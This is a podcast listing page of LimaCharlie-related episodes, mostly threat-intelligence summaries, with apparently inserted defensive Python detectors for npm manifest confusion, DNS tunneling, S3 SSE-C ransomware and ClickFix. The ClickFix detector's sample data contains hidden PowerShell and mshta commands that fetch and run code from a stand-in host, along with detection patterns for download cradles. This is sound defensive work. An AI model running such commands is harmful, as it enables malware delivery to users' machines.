Podcasts about limacharlie

  • 35 podcasts
  • 144 episodes
  • 40m average duration
  • 1 weekly episode
  • Latest episode: Apr 11, 2025




Latest podcast episodes about limacharlie

The Cybersecurity Defenders Podcast
#207 - Intel Chat: MirrorFace, Neptune, SparrowDoor & CrushFTP
Apr 11, 2025 | 30:17

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community. Japanese law enforcement has publicly linked a Chinese state-sponsored threat group known as MirrorFace to a series of cyberattacks that have targeted Japan over the past five years. Researchers at Cyfirma have detailed a new campaign in which attackers use a Remote Access Trojan (RAT) dubbed Neptune to hijack Windows systems. ESET researchers have discovered new versions of SparrowDoor, the Windows backdoor used by the China-aligned FamousSparrow espionage group. CISA has added a recently disclosed authentication bypass vulnerability in CrushFTP (tracked as CVE-2025-31161) to its Known Exploited Vulnerabilities (KEV) catalog.

The Cybersecurity Defenders Podcast
#205 - Intel Chat: OPSEC FAIL, Manifest Confusion & GitHub Actions
Apr 1, 2025 | 29:35

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community. On March 24, The Atlantic's editor-in-chief Jeffrey Goldberg reported a significant OPSEC failure involving U.S. Secretary of Defense Pete Hegseth, who allegedly sent him detailed U.S. military plans over Signal, an encrypted messaging app, on March 15. A newly discovered supply chain attack on the npm ecosystem is targeting developers by backdooring local packages through a process known as "manifest confusion": the manifest the registry serves to package managers does not match the package.json inside the published tarball, so tooling that trusts the registry view never sees the dependencies or install scripts that actually run. Unit 42 researchers at Palo Alto Networks have uncovered an ongoing software supply chain attack targeting GitHub repositories via malicious GitHub Actions workflows.
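The manifest confusion check implied above can be automated. The following is an added example, not code from the podcast, from LimaCharlie, or from the researchers it mentions: it compares the fields that matter for supply-chain risk between a registry-side manifest and the package.json inside the tarball that would actually be installed. The registry document and the tarball are constructed in memory; in practice the registry view comes from `https://registry.npmjs.org/<name>/<version>` and the tarball from the `dist.tarball` URL in that document.

```python
"""Detect npm "manifest confusion": the registry's package manifest (what the
package manager reads) disagrees with the package.json inside the published
tarball (what actually ships).  Added example; registry document and tarball
are constructed in memory."""
import io
import json
import tarfile

# A mismatch in any of these means the registry view is not what gets installed.
CHECKED_FIELDS = ("name", "version", "dependencies", "scripts")


def build_tarball(package_json: dict) -> bytes:
    """Build an npm-style gzip tarball containing package/package.json."""
    buf = io.BytesIO()
    data = json.dumps(package_json).encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_tarball_manifest(tarball: bytes) -> dict:
    """Return the parsed package/package.json from tarball bytes."""
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        member = tar.extractfile("package/package.json")
        if member is None:
            raise ValueError("tarball has no package/package.json")
        return json.load(member)


def find_manifest_confusion(registry_manifest: dict, tarball: bytes) -> dict:
    """Return {field: (registry_value, tarball_value)} for every field that differs."""
    tarball_manifest = read_tarball_manifest(tarball)
    mismatches = {}
    for field in CHECKED_FIELDS:
        reg = registry_manifest.get(field)
        tb = tarball_manifest.get(field)
        if reg != tb:
            mismatches[field] = (reg, tb)
    return mismatches


# Constructed sample: the registry claims "no dependencies, no scripts" ...
REGISTRY_VIEW = {
    "name": "example-pkg",
    "version": "1.0.0",
    "dependencies": {},
    "scripts": {},
}
# ... while the tarball pulls in an extra dependency and a postinstall hook.
TARBALL_VIEW = {
    "name": "example-pkg",
    "version": "1.0.0",
    "dependencies": {"evil-helper": "^1.0.0"},
    "scripts": {"postinstall": "node ./setup.js"},
}
SAMPLE_TARBALL = build_tarball(TARBALL_VIEW)

if __name__ == "__main__":
    for field, (reg, tb) in find_manifest_confusion(REGISTRY_VIEW, SAMPLE_TARBALL).items():
        print(f"MISMATCH {field}: registry={reg!r} tarball={tb!r}")
```

The check is cheap enough to run in CI against every third-party package that a lockfile update introduces; the `scripts` and `dependencies` fields are the ones attackers care about, since they decide what code runs at install time.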

Stew and the Nunn
SATN Presents Lima Charlie Episode 4 with KJ
Apr 1, 2025 | 63:39

LC - Lima Charlie: Loud and Clear. Welcome to The Stew and The Nunn presents Lima Charlie. For those not versed in the military phonetic alphabet, Lima Charlie means Loud and Clear. The purpose of this series is to spotlight the GWOT era with GWOT veterans telling their stories. Our guest this week is KJ.

Stew and the Nunn
SATN Episode 355 with Shaun McCutcheon and Dan Backer
Apr 1, 2025 | 69:17

Shaun McCutcheon and Dan Backer - EXCLUSIVE: Conservative Group Seeks DOJ, FEC Probes of Jasmine Crockett

The Cybersecurity Defenders Podcast
#204 - Intel Chat: Wiz, Windows, SocGholish, WDAC & BLE
Mar 21, 2025 | 34:49

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Google has announced a $32 billion all-cash acquisition of the Israeli cybersecurity startup Wiz, making it one of the largest deals in the company's history. A newly discovered zero-day vulnerability in Windows allows attackers to escalate privileges, potentially granting them full control over affected systems. Security researchers have identified new intrusion techniques used by the SocGholish malware framework, which is increasingly being leveraged to distribute ransomware. Security researchers have uncovered a new technique that allows attackers to disable Endpoint Detection and Response (EDR) solutions using Windows Defender Application Control (WDAC) policies. Security researchers have discovered undocumented commands in a widely used Bluetooth chip, potentially exposing over a billion devices to security risks.

The Cybersecurity Defenders Podcast
#202 - Intel Chat: CISA, BianLian (not), Crafty Camel, GitHub malvertising & SCADA
Mar 14, 2025 | 38:28

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of the LimaCharlie community. The Cybersecurity and Infrastructure Security Agency (CISA) is facing significant operational challenges as budget constraints force it to scale back key cybersecurity programs. Scammers are taking a new approach to extortion by mailing physical ransom letters to victims, claiming to be the operators of the BianLian ransomware group. A newly identified advanced persistent threat (APT) group, dubbed "Crafty Camel," has been targeting aviation operational technology (OT) systems using a sophisticated technique involving polyglot files. A new malvertising campaign is leveraging deceptive online ads to distribute information-stealing malware hosted on GitHub, highlighting an ongoing evolution in cybercriminal tactics. Security researchers have disclosed details of multiple vulnerabilities in Supervisory Control and Data Acquisition (SCADA) systems that could be exploited to facilitate attacks on industrial environments.

The Cybersecurity Defenders Podcast
#199 - Intel Chat: Lazarus Group, BadPilot, PAN-OS, emoji exfil, Kitty Stealer & PolarEdge
Mar 7, 2025 | 36:13

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. North Korea's state-backed Lazarus Group is believed to be responsible for the largest cryptocurrency heist ever recorded, stealing $1.5 billion from the Bybit exchange. The "BadPilot" hacking campaign has been linked to Russia's Sandworm threat group, a unit of the GRU known for cyber espionage and disruptive attacks. GreyNoise has observed active exploitation of CVE-2025-0108, a critical authentication bypass vulnerability in Palo Alto Networks' PAN-OS. Security researcher Paul Butler has demonstrated a novel technique for smuggling arbitrary data using emojis, leveraging the way modern text encoding and rendering systems handle Unicode characters. Kitty Stealer is a newly identified malware targeting macOS systems, designed to steal sensitive user data such as credentials, browser cookies, and cryptocurrency wallets. SEKOIA researchers have uncovered a previously unknown IoT botnet named PolarEdge, which has been operating covertly for an extended period.

The Cybersecurity Defenders Podcast
#195 - Intel Chat: APT tunnelling, BadPilot, CVE-2025-0108, emojis & Kitty Stealer (take 2)
Feb 21, 2025 | 35:09

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Network traffic tunneling is a technique used by attackers to bypass security controls and exfiltrate data or establish covert communication channels. Threat actors use various tunneling methods, including DNS tunneling, HTTP/S tunneling, and ICMP tunneling, each with its own advantages depending on the target environment: DNS is almost never blocked outbound, HTTP/S blends into normal web traffic and hides inside TLS, and ICMP is rarely inspected at all. The "BadPilot" hacking campaign has been linked to Russia's Sandworm threat group, a unit of the GRU known for cyber espionage and disruptive attacks. GreyNoise has observed active exploitation of CVE-2025-0108, a critical authentication bypass vulnerability in Palo Alto Networks' PAN-OS. This vulnerability allows unauthenticated attackers to gain administrative access to affected firewall devices, posing a significant risk to organizations relying on PAN-OS for network security. Security researcher Paul Butler has demonstrated a novel technique for smuggling arbitrary data using emojis, leveraging the way modern text encoding and rendering systems handle Unicode characters. Kitty Stealer is a newly identified malware targeting macOS systems, designed to steal sensitive user data such as credentials, browser cookies, and cryptocurrency wallets.
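DNS tunneling is the variant defenders can most easily hunt from logs they already have, because the encoded payload has to live in the query name. The following added example (not code from the podcast or LimaCharlie) scores DNS query logs per parent domain on three indicators a tunnel cannot avoid: many distinct subdomains, long data-carrying labels, and a preference for record types that move bulk data (TXT, NULL, CNAME). The log lines, client addresses, and the `badhost.net` domain are constructed for the example.

```python
"""Score DNS query logs for tunneling indicators, aggregated per parent domain.
Added example; the sample log is constructed."""
import re
from collections import defaultdict

# Constructed sample log: "<timestamp> <client_ip> <qname> <qtype>" per line.
SAMPLE_DNS_LOG = """\
2025-02-20T10:00:01Z 10.0.0.5 www.example.com A
2025-02-20T10:00:02Z 10.0.0.5 mail.example.com MX
2025-02-20T10:00:03Z 10.0.0.9 4a6f686e20446f652c2053534e2031.tun.badhost.net TXT
2025-02-20T10:00:03Z 10.0.0.9 32332d34352d36373839203030.tun.badhost.net TXT
2025-02-20T10:00:04Z 10.0.0.9 6e6f20636c657374206c6f67696e.tun.badhost.net TXT
2025-02-20T10:00:04Z 10.0.0.9 70617373776f72643a2068756e74.tun.badhost.net TXT
2025-02-20T10:00:05Z 10.0.0.9 ZXhmaWx0cmF0ZWQgZGF0YSBoZXJl.tun.badhost.net TXT
2025-02-20T10:00:06Z 10.0.0.5 cdn.example.com A
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
BULK_QTYPES = {"TXT", "NULL", "CNAME"}   # record types that carry large answers


def split_qname(qname):
    """Return (subdomain, parent).  Simplification: the parent is the last two
    labels; production code should use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def analyze(log_text, min_unique=4, min_label_len=20, min_bulk_ratio=0.5):
    """Per parent domain: unique subdomains, mean leading-label length, share
    of bulk-capable query types, and how many of the three thresholds tripped."""
    stats = defaultdict(lambda: {"subs": set(), "lens": [], "n": 0, "bulk": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                                   # skip malformed lines
        _ts, _client, qname, qtype = m.groups()
        sub, parent = split_qname(qname)
        s = stats[parent]
        s["n"] += 1
        if sub:
            s["subs"].add(sub)
            s["lens"].append(len(sub.split(".")[0]))   # the data-carrying label
        if qtype.upper() in BULK_QTYPES:
            s["bulk"] += 1
    findings = {}
    for parent, s in stats.items():
        mean_len = sum(s["lens"]) / len(s["lens"]) if s["lens"] else 0.0
        bulk_ratio = s["bulk"] / s["n"]
        tripped = [
            len(s["subs"]) >= min_unique,
            mean_len >= min_label_len,
            bulk_ratio >= min_bulk_ratio,
        ]
        findings[parent] = {
            "unique_subdomains": len(s["subs"]),
            "mean_label_len": round(mean_len, 1),
            "bulk_ratio": round(bulk_ratio, 2),
            "score": sum(tripped),
        }
    return findings


def suspected_tunnels(log_text, min_score=2):
    """Parent domains that trip at least min_score of the three indicators."""
    return sorted(p for p, f in analyze(log_text).items() if f["score"] >= min_score)


if __name__ == "__main__":
    for parent, f in analyze(SAMPLE_DNS_LOG).items():
        print(parent, f)
    print("suspected:", suspected_tunnels(SAMPLE_DNS_LOG))
```

Expect false positives from legitimate services that encode data in DNS (some antivirus reputation lookups, CDN health checks); tune by allow-listing those parents rather than by raising thresholds, since a slow tunnel can stay under any single threshold.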

The Cybersecurity Defenders Podcast
#193 - Intel Chat: Ransomware drops, 8Base, XE Group, SolarWinds-esque attack & cyber-espionage in South Asia
Feb 13, 2025 | 33:06

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Ransomware payments saw a significant drop in 2024, falling by 35% compared to the previous year. Law enforcement agencies have arrested a suspected core member of the 8Base ransomware group, marking a significant development in efforts to combat cybercrime. The XE Group, a financially motivated cybercrime organization, has shifted its tactics from traditional card-skimming attacks to more sophisticated supply chain compromises. Security researchers at watchTowr have demonstrated a supply chain attack technique that surpasses the scale and stealth of the infamous SolarWinds breach: by re-registering abandoned Amazon S3 buckets that software update mechanisms and deployment scripts still referenced, they received millions of requests for binaries and configuration they could have replaced at will. A newly discovered cyber-espionage campaign is targeting government and military entities in South Asia, according to researchers at Unit 42.

The Cybersecurity Defenders Podcast
#191 - Intel Chat: Lumma Stealer, xWorm, WSDOT & FortiOS
Feb 4, 2025 | 25:46

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Lumma Stealer, an information-stealing malware, has been observed using new evasion techniques to avoid detection. Researchers at CloudSEK have uncovered a trojanized version of the xWorm Remote Access Trojan (RAT) builder that is being secretly distributed among cybercriminals. A recent disclosure by security researcher Zach Latta highlights how the Washington State Department of Transportation (WSDOT) inadvertently exposed sensitive server credentials on its public website. A critical out-of-bounds write vulnerability (CVE-2024-21762) in the SSL VPN component of Fortinet's FortiOS has been actively exploited in the wild, allowing unauthenticated attackers to execute arbitrary code on affected systems.

The Cybersecurity Defenders Podcast
#189 - Intel Chat: Docker, LDAPNightmare, Codefinger & Fortinet FortiGate
Jan 28, 2025 | 34:43

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. As of earlier this week, Docker's system status page reports an ongoing issue affecting Docker Desktop on macOS, where malware alerts are triggered by macOS identifying com.docker.vmnetd or com.docker.socket as potential threats. SafeBreach Labs has released a proof-of-concept (PoC) exploit for CVE-2024-49113, a critical vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) implementation that impacts unpatched Windows Servers, including Active Directory Domain Controllers (DCs). The Halcyon RISE team has uncovered a novel ransomware campaign, attributed to an actor dubbed Codefinger, targeting Amazon S3 buckets: using stolen AWS credentials, the attacker re-encrypts objects with Server-Side Encryption with Customer-Provided Keys (SSE-C), so that only the attacker's key can decrypt them and AWS cannot recover the data, then sets a lifecycle rule so the files are deleted unless the ransom is paid. A recent campaign has been targeting Fortinet FortiGate firewalls with exposed management interfaces, likely exploiting a zero-day vulnerability to gain unauthorized administrative access. Sophos recently reported on two distinct ransomware campaigns utilizing unique techniques to pressure victims and evade detection.
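The SSE-C technique leaves a clear trail in CloudTrail S3 data events, and it can be blocked outright with a bucket policy. The following added example (not code from the podcast, Halcyon, or AWS) triages constructed CloudTrail-shaped records for a burst of SSE-C writes by one principal, escalates when that principal also changed the bucket lifecycle, and checks a bucket policy for a Deny on the `s3:x-amz-server-side-encryption-customer-algorithm` condition key. The `additionalEventData.SSEApplied` field name is an assumption about the CloudTrail record shape; the principals, bucket and keys are constructed.

```python
"""Triage CloudTrail S3 data events for the SSE-C ransomware pattern, and
check a bucket policy for the preventive control.  Added example; records
are constructed and the SSEApplied field location is assumed."""
from collections import defaultdict

SSEC_CONDITION_KEY = "s3:x-amz-server-side-encryption-customer-algorithm"


def _ev(name, principal, bucket, key=None, sse=None, src_ip="203.0.113.10"):
    """Build a trimmed CloudTrail-shaped record (constructed sample data)."""
    e = {
        "eventName": name,
        "userIdentity": {"arn": "arn:aws:iam::123456789012:" + principal},
        "sourceIPAddress": src_ip,
        "requestParameters": {"bucketName": bucket},
    }
    if key is not None:
        e["requestParameters"]["key"] = key
    if sse is not None:
        e["additionalEventData"] = {"SSEApplied": sse}   # assumed field name
    return e


SAMPLE_EVENTS = [
    _ev("PutObject", "user/ci-uploader", "corp-backups", "db/2025-01-10.sql", "SSE_KMS", "10.1.2.3"),
    _ev("GetObject", "user/ci-uploader", "corp-backups", "db/2025-01-10.sql", None, "10.1.2.3"),
    # A leaked key rewrites each object onto itself with an attacker-held key ...
    _ev("CopyObject", "user/leaked-key", "corp-backups", "db/2025-01-10.sql", "SSE_C"),
    _ev("CopyObject", "user/leaked-key", "corp-backups", "db/2025-01-11.sql", "SSE_C"),
    _ev("CopyObject", "user/leaked-key", "corp-backups", "db/2025-01-12.sql", "SSE_C"),
    # ... drops a note, and sets a lifecycle rule so the originals expire.
    _ev("PutObject", "user/leaked-key", "corp-backups", "HOW_TO_RECOVER.txt", "SSE_S3"),
    _ev("PutBucketLifecycle", "user/leaked-key", "corp-backups"),
    _ev("PutObject", "user/ci-uploader", "corp-backups", "db/2025-01-13.sql", "SSE_KMS", "10.1.2.3"),
]

# Preventive control: deny any PutObject (CopyObject needs it too) that carries
# the SSE-C algorithm header at all.  Scope Resource to your own buckets.
DENY_SSEC_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyCustomerProvidedKeys",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:PutObject",
        "Resource": "arn:aws:s3:::corp-backups/*",
        "Condition": {"Null": {SSEC_CONDITION_KEY: "false"}},
    }],
}


def ssec_writes_by_principal(events):
    """{(principal_arn, bucket): count} of writes encrypted with a customer key."""
    counts = defaultdict(int)
    for e in events:
        if e["eventName"] not in ("PutObject", "CopyObject"):
            continue
        if e.get("additionalEventData", {}).get("SSEApplied") == "SSE_C":
            counts[(e["userIdentity"]["arn"], e["requestParameters"]["bucketName"])] += 1
    return dict(counts)


def lifecycle_changes(events):
    """{(principal_arn, bucket)} pairs that changed a bucket's lifecycle configuration."""
    return {(e["userIdentity"]["arn"], e["requestParameters"]["bucketName"])
            for e in events if e["eventName"] == "PutBucketLifecycle"}


def triage(events, min_ssec_writes=3):
    """One alert per (principal, bucket) with a burst of SSE-C writes; the
    lifecycle flag escalates it from 'odd' to 'destroying the originals'."""
    lifecycle = lifecycle_changes(events)
    alerts = []
    for (arn, bucket), n in ssec_writes_by_principal(events).items():
        if n >= min_ssec_writes:
            alerts.append({"principal": arn, "bucket": bucket, "ssec_writes": n,
                           "lifecycle_changed": (arn, bucket) in lifecycle})
    return alerts


def policy_blocks_ssec(policy):
    """True if some Deny statement on s3:PutObject is conditioned on the SSE-C header."""
    for st in policy.get("Statement", []):
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if st.get("Effect") != "Deny":
            continue
        if not any(a in ("s3:PutObject", "s3:*", "*") for a in actions):
            continue
        for args in st.get("Condition", {}).values():
            if SSEC_CONDITION_KEY in args:
                return True
    return False


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print("ALERT", a)
    print("policy blocks SSE-C:", policy_blocks_ssec(DENY_SSEC_POLICY))
```

The detection only works if S3 data events are enabled in CloudTrail for the buckets you care about; management events alone will show the lifecycle change but not the object rewrites. The policy is the stronger control, since there is no recovery path once the objects are re-encrypted with a key AWS never held.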

The Cybersecurity Defenders Podcast
#186 - Intel Chat: Amit Yoran, USDoD, BeyondTrust & LDAPNightmare
Jan 8, 2025 | 23:50

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. We pause to honor the life and legacy of Amit Yoran, a visionary leader in the world of cybersecurity who passed away on January 4, 2025, after battling cancer. In April 2024, a threat actor known as "USDoD" advertised a massive database for sale on BreachForums, claiming it contained 2.9 billion records encompassing personal information of individuals from the United States, United Kingdom, and Canada. In December 2024, the U.S. Treasury Department disclosed a significant cybersecurity breach attributed to Chinese state-sponsored hackers, who used a stolen API key for BeyondTrust's Remote Support SaaS to reach Treasury workstations. SafeBreach Labs has published a proof-of-concept (PoC) exploit for CVE-2024-49113, dubbed "LDAPNightmare." This vulnerability affects Windows Servers using the Lightweight Directory Access Protocol (LDAP) and enables attackers to crash unpatched systems.

The Cybersecurity Defenders Podcast
#183 - Hacker Holidays: When the lights went out in Ukraine (Part 1 & 2)
Dec 31, 2024 | 37:59

On this episode of The Cybersecurity Defenders Podcast, we share both parts of "When the Lights Went Out in Ukraine." Beginning on January 13th, 2022, a Russian APT installed wiper malware on the IT networks of government, NGO, and IT companies across Ukraine. The malicious program was designed to look like ransomware but contained no recovery feature; it simply destroyed any computer it wished. Just one day later, hackers from the intelligence service of Belarus, Russia's close ally, took down 70 websites belonging to the Ukrainian government. This was tilling: laying down the foundation for an all-out ground attack. Plastered on the 70 downed websites was a message from the attackers: "be afraid," they wrote, "and expect the worst." This episode was written by the talented Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie. And a special thank you to Robert Lipovsky for sharing his first-hand knowledge.

The Cybersecurity Defenders Podcast
#182 - Hacker Holidays: Stuxnet (Part 1 & 2)
Dec 30, 2024 | 37:52

This episode of the Cybersecurity Defenders podcast is a two-part mini-series about the greatest cyber attack ever conceived: Stuxnet. Joining to help us tell the story is Kim Zetter, journalist and author of Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon. Stuxnet is a malicious computer worm first uncovered in 2010 and thought to have been in development since at least 2005. Stuxnet targets supervisory control and data acquisition (SCADA) systems and is believed to be responsible for causing substantial damage to the nuclear program of Iran. Although neither country has openly admitted responsibility, the worm is widely understood to be a cyberweapon built jointly by the United States and Israel in a collaborative effort known as Operation Olympic Games. The program, started during the Bush administration, was rapidly expanded within the first months of Barack Obama's presidency. This episode was written by Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie.

The Cybersecurity Defenders Podcast
#180 - Hacker Holidays: Titan Rain
Dec 28, 2024 | 20:20

In this episode of the Cybersecurity Defenders podcast, we recount some hacker history and tell the story of Shawn Carpenter, a rogue cybersecurity defender who singlehandedly identified a Chinese APT. It is a phenomenal story that exemplifies the grit and moral fortitude that the best defenders among us have. Titan Rain was a series of coordinated attacks on computer systems in the United States beginning in 2003; they are known to have been ongoing for at least three years. The attacks originated in Guangdong, China, and the activity is believed to be associated with a state-sponsored advanced persistent threat. It was given the designation Titan Rain by the federal government of the United States. Titan Rain hackers gained access to many United States defense contractor computer networks, which were targeted for their sensitive information, including those at Lockheed Martin, Sandia National Laboratories, Redstone Arsenal, and NASA. This episode was written by Nathaniel Nelson, narrated by Christopher Luft and produced by the team at LimaCharlie.

The Cybersecurity Defenders Podcast
#179 - Hacker Holidays: Operation Flyhook
Dec 27, 2024 | 18:05

In this episode, we recount the story of Operation Flyhook, an FBI sting operation in 2000 that resulted in the arrest of two Russian hackers on American soil. It is quite the story and leaves us with some pretty heavy conclusions. This episode was written by Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie. Any questions or feedback can be directed to defenders@limacharlie.io

The Cybersecurity Defenders Podcast
#178 - Intel Chat: ptcpdump, Target adopts TLSH, Cleo, XLoader & HeartCrypt
Dec 21, 2024 | 31:00

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. ptcpdump is an eBPF-based version of tcpdump that adds process information to each packet. It supports filtering by process ID, process name, container ID, and Kubernetes pod name. In a recent implementation, Target's cybersecurity team adopted TLSH (Trend Micro Locality Sensitive Hash) to improve their malware detection capabilities, since a locality-sensitive hash lets near-identical samples cluster together where a cryptographic hash would treat every byte change as a new file. Huntress recently issued a threat advisory regarding active exploitation of a zero-day vulnerability affecting Cleo's file transfer software, specifically impacting LexiCom, VLTrader, and Harmony versions up to 5.8.0.21. Sublime Security recently analyzed a phishing campaign that impersonates Microsoft SharePoint to deliver the XLoader malware. Palo Alto Networks' Unit 42 team has uncovered a new packer-as-a-service (PaaS) operation named HeartCrypt, which has been active since July 2023 and began sales in February 2024. HeartCrypt is designed to obfuscate malware, making detection by security solutions more challenging.

The Cybersecurity Defenders Podcast
#177 - Intel Chat: Supply-Chain Firewall, Scattered Spider, Linux malware & another NTLM exploit
Dec 12, 2024 | 27:19

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Datadog Security Labs has introduced the Supply-Chain Firewall, a new open-source tool designed to protect developers from malicious and vulnerable packages sourced from PyPI and npm repositories. U.S. authorities have arrested 19-year-old Remington Goy Ogletree, known online as "remi," for allegedly breaching a U.S. financial institution and two unnamed telecommunications firms. A recent study titled "A Study of Malware Prevention in Linux Distributions" examines the challenges of preventing and detecting malware within Linux distribution package repositories. A recently identified zero-day NTLM hash-disclosure vulnerability, reported by 0patch, affects all modern versions of Windows Workstation and Server operating systems, from Windows 7 and Server 2008 R2 up to the latest Windows 11 v24H2 and Server 2022; it leaks the user's NTLM credentials when a malicious file is merely viewed in Windows Explorer. And you can subscribe to Detection Engineering Weekly here.

The Cybersecurity Defenders Podcast
#175 - Intel Chat: Hydra dark web, DOC entity list, Venom Spider & flowbreaking
Dec 6, 2024 | 28:56

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Russian courts have sentenced Stanislav Moiseyev, the leader of the Hydra dark web marketplace, to life imprisonment. The U.S. Commerce Department has expanded its export controls, adding nearly 140 Chinese technology companies to its "entity list." This action primarily targets firms involved in the production of computer chips, chipmaking tools, and related software, including Chinese-owned entities operating in Japan, South Korea, and Singapore. Researchers have uncovered new malware strains, RevC2 and Venom Loader, tied to the sophisticated threat actor known as Venom Spider. Recent analyses have identified a class of vulnerability in generative AI systems, termed "flowbreaking" exploits, which can lead to unintended data leaks.

The Cybersecurity Defenders Podcast
#173 - Intel Chat: ClickFix, Raspberry Robin, Gelsemium, Fancy Bear & Salt Typhoon
Nov 28, 2024 | 43:18

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. In recent months, cybersecurity researchers have observed a surge in the use of a social engineering technique known as "ClickFix." This method involves threat actors presenting users with deceptive error messages or fake CAPTCHA prompts that instruct them to manually execute malicious commands, typically by pasting a clipboard-loaded PowerShell one-liner into the Windows Run dialog; because the user launches the command themselves, no exploit or macro is needed and the execution chain starts from explorer.exe or the browser rather than from a document. Raspberry Robin, also known as Roshtyak, is a highly obfuscated malware first discovered in 2021, notable for its complex binary structure and advanced evasion techniques. It primarily spreads via infected USB devices and employs multi-layered execution to obscure its true purpose. A China-linked Advanced Persistent Threat (APT) group, Gelsemium, has been observed targeting Linux systems for the first time, deploying previously undocumented malware in an espionage campaign. Historically known for targeting Windows platforms, this new activity signifies a shift towards Linux, possibly driven by the increasing security of Windows systems. Russia's APT28 hacking group, also known as Fancy Bear or Unit 26165, has developed a novel technique dubbed the "nearest neighbor attack" to exploit Wi-Fi networks remotely. Hackers linked to the Chinese government, known as Salt Typhoon, have deeply infiltrated U.S. telecommunications infrastructure, gaining the ability to intercept unencrypted phone calls and text messages. The group exploited vulnerabilities in the wiretap systems used by U.S. authorities for lawful interception, marking what Senator Mark Warner has called "the worst telecom hack in our nation's history."
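Because ClickFix relies on the victim typing the command, it produces a distinctive process lineage that endpoint telemetry catches well: a script host spawned by explorer.exe or a browser, with a command line built for a clipboard paste. The following added example (not code from the podcast or LimaCharlie's own detection rules) scores constructed process-creation events on that lineage plus command-line indicators seen in ClickFix lures; the event shape, paths and the `bad.example` host are constructed.

```python
"""Score process-creation events for the ClickFix pattern: a script host launched
from explorer.exe or a browser with a paste-friendly malicious command line.
Added example; the events below are constructed."""
import re

# Run-dialog or browser-initiated parents, and the script hosts they should
# rarely spawn with a download-and-execute command line.
SPAWN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "curl.exe"}

INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("download_cradle", re.compile(r"(?:\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|mshta\s+https?:)", re.I)),
    # ClickFix lures append "verification" text so the pasted line looks benign.
    ("fake_captcha_text", re.compile(r"i am not a robot|verify you are human|recaptcha|verification id", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
]

# Constructed process events: parent image, child image, child command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://bad.example/verify.ps1 | iex" '
                '# "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://bad.example/captcha.hta"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Suspicious lineage is worth 2; each command-line indicator adds 1."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    hits = [name for name, rx in INDICATORS if rx.search(ev["cmdline"])]
    lineage = parent in SPAWN_PARENTS and image in SCRIPT_HOSTS
    return {"parent": parent, "image": image, "lineage": lineage,
            "indicators": hits, "score": len(hits) + (2 if lineage else 0)}


def clickfix_candidates(events, min_score=3):
    """Events at or above the threshold, in input order.  Lineage alone (score 2)
    is not enough: users do open cmd.exe from the Run dialog."""
    scored = (score_event(e) for e in events)
    return [s for s in scored if s["score"] >= min_score]


if __name__ == "__main__":
    for s in clickfix_candidates(SAMPLE_EVENTS):
        print(s["parent"], "->", s["image"], s["score"], s["indicators"])
```

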